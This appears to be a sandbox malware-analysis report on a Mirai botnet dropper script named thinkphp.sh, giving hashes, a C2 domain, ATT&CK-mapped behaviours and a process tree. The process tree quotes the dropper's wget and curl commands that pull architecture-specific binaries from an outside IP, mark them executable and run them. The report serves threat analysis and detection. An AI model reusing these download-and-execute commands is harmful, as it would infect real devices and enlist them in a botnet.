mirai | b70f72d434a70753f21c18e3f40d2a36883f06d8875c343102b624057f6d69c7

Analysis

max time kernel
5s
max time network
111s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
17-12-2024 15:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

thinkphp.sh
Size

2KB
MD5

db3a7457f4154588f7433e2942262840
SHA1

643f9177e1c2e4fb068a738aed39d9f4077a1b40
SHA256

b70f72d434a70753f21c18e3f40d2a36883f06d8875c343102b624057f6d69c7
SHA512

d7fecb9613574057145723589f2f34a5b957791f4b63c8529301e6cd4829a1538b38f4e55900303b73124855b67e6af97dfd57c2008c9f87f620675d40ffd9bd

Score

10^/10

mirai unstable antivm botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

servers.vlrt-gap.com

Extracted

Family

mirai

Botnet

UNSTABLE

Extracted

Family

mirai

Botnet

UNSTABLE

servers.vlrt-gap.com

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
675	chmod
684	chmod
702	chmod
720	chmod

Deletes itself 1 IoCs

pid	Process
721	WTH

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/WTH	676	WTH
/tmp/WTH	685	WTH
/tmp/WTH	703	WTH
/tmp/WTH	721	WTH

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTH
File opened for modification	/dev/misc/watchdog	WTH

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTH
File opened for modification	/bin/watchdog	WTH

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	rn67q2hndlku	721	WTH

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
679	wget
682	curl
683	cat

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/zmap.x86	curl
File opened for modification	/tmp/WTH	thinkphp.sh
File opened for modification	/tmp/zmap.mpsl	wget
File opened for modification	/tmp/zmap.x86	wget
File opened for modification	/tmp/zmap.mips	wget
File opened for modification	/tmp/zmap.mips	curl
File opened for modification	/tmp/zmap.mpsl	curl
File opened for modification	/tmp/zmap.arm	wget
File opened for modification	/tmp/zmap.arm	curl

/tmp/thinkphp.sh
/tmp/thinkphp.sh
1⤵
- Writes file to tmp directory
PID:645
- /usr/bin/wget
  wget http://185.196.11.47/zmap.x86
  2⤵
  - Writes file to tmp directory
  PID:647
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:661
- /bin/cat
  cat zmap.x86
  2⤵
  PID:672
- /bin/chmod
  chmod +x systemd-private-38846cdf44cb471dafcc5b1541aa286f-systemd-timedated.service-qcndJ6 thinkphp.sh WTH zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:675
- /tmp/WTH
  ./WTH thinkphp.selfrep
  2⤵
  - Executes dropped EXE
  PID:676
- /usr/bin/wget
  wget http://185.196.11.47/zmap.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:679
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:682
- /bin/cat
  cat zmap.mips
  2⤵
  - System Network Configuration Discovery
  PID:683
- /bin/chmod
  chmod +x systemd-private-38846cdf44cb471dafcc5b1541aa286f-systemd-timedated.service-qcndJ6 thinkphp.sh WTH zmap.mips zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/WTH
  ./WTH thinkphp.selfrep
  2⤵
  - Executes dropped EXE
  PID:685
- /usr/bin/wget
  wget http://185.196.11.47/zmap.mpsl
  2⤵
  - Writes file to tmp directory
  PID:687
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:692
- /bin/cat
  cat zmap.mpsl
  2⤵
  PID:700
- /bin/chmod
  chmod +x systemd-private-38846cdf44cb471dafcc5b1541aa286f-systemd-timedated.service-qcndJ6 thinkphp.sh WTH zmap.mips zmap.mpsl zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:702
- /tmp/WTH
  ./WTH thinkphp.selfrep
  2⤵
  - Executes dropped EXE
  PID:703
- /usr/bin/wget
  wget http://185.196.11.47/zmap.arm
  2⤵
  - Writes file to tmp directory
  PID:705
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:712
- /bin/cat
  cat zmap.arm
  2⤵
  PID:718
- /bin/chmod
  chmod +x systemd-private-38846cdf44cb471dafcc5b1541aa286f-systemd-timedated.service-qcndJ6 thinkphp.sh WTH zmap.arm zmap.mips zmap.mpsl zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/WTH
  ./WTH thinkphp.selfrep
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  PID:721
- /usr/bin/wget
  wget http://185.196.11.47/zmap.arm5
  2⤵
  PID:723

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTH

Filesize
94KB

MD5
8ae4ac18a3b34fba963f59a42ff02fb7

SHA1
e9f75cf21972b2c953163d64d3cb89bd6a93cc1b

SHA256
c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a

SHA512
af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0

Download Submit
/tmp/WTH

Filesize
94KB

MD5
d81e9564b8b9d62d70bda936d927d875

SHA1
42706a08b0545984ed5a5cfbdff3fe2ab62ca552

SHA256
c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d

SHA512
282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886

Download Submit
/tmp/WTH

Filesize
74KB

MD5
9784e8db8dae548a6593644e3a168579

SHA1
afa7c4ce4b0122ec5f22dc37aa7658f41cb01008

SHA256
4278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129

SHA512
7f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c

Download Submit
/tmp/zmap.x86

Filesize
61KB

MD5
d1f752879420a6d45d76f130281392d6

SHA1
46a92c0efae33b8a826dc48daa3dbf3d30be4a15

SHA256
4fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914

SHA512
91e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads